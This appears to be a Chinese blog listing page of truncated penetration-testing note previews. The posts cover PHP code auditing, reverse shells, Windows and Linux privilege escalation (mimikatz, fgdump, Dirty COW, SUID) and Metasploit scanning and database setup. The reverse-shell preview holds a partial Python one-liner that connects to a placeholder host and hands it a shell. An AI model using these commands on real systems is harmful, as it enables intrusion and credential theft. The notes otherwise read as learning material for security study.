笔记
文章平均质量分 79
~~...
菜鸟
展开
-
php代码审计
代码审计基础配置常量定义配置选项基础配置常量定义1.PHP_INI_USER PHP脚本,windows注册表中设置2.PHP_INI_PERDIR php.ini htaccess,httpd.conf中设置3.PHP_INI_SYSTEMphp.ini httpd.conf中设置4.PHP_INI_ALL 任何地方中设置5.php.ini only php原创 2020-06-03 18:44:55 · 738 阅读 · 0 评论 -
反弹shell
反弹shellpythonphppython弹出终端python -c 'import pty; pty.spawn("/bin/bash")'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(原创 2020-06-02 00:52:55 · 308 阅读 · 0 评论 -
本地提权
本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组window常见window权限:普通用户:user管理员:administrator系统:systemadmin->systemSysinternalsSuite->PsExec.exe微软发布的一套非常强大的免费工具程序集Ps原创 2020-06-01 21:51:29 · 633 阅读 · 0 评论 -
Metasploit端口扫描
Metasploit nmap 高级扫描(伪装 成空闲主机对目标探测:递增ip帧标识机制)利用 Metasploit 中 auxiliary/scanner/ip/ipidseq模块扫描 空闲主机设置参数 :RHOSTS [IP](网段,ip列表文件,地址范围)THREADS 线程数使用nmap -sI 命令 开始扫描Msf 终端中使用nmap先连接数据库 db_connect ...原创 2020-03-21 17:31:46 · 640 阅读 · 0 评论 -
Metasploit 中使用数据库 将nmap输出导入数据库
Metasploit 支持Mysql ,Postgresql ,SQLlite3 三种数据库连接默认使用PostgreSQL先启动数据库/etc/init.d/postgresql start进入 msf终端建立数据库连接 (PostgreSQL 默认用户名密码 postgres:toor)msf为数据库名db_connect postgres:toor@127.0.0.1/msf...原创 2020-03-21 00:14:25 · 675 阅读 · 0 评论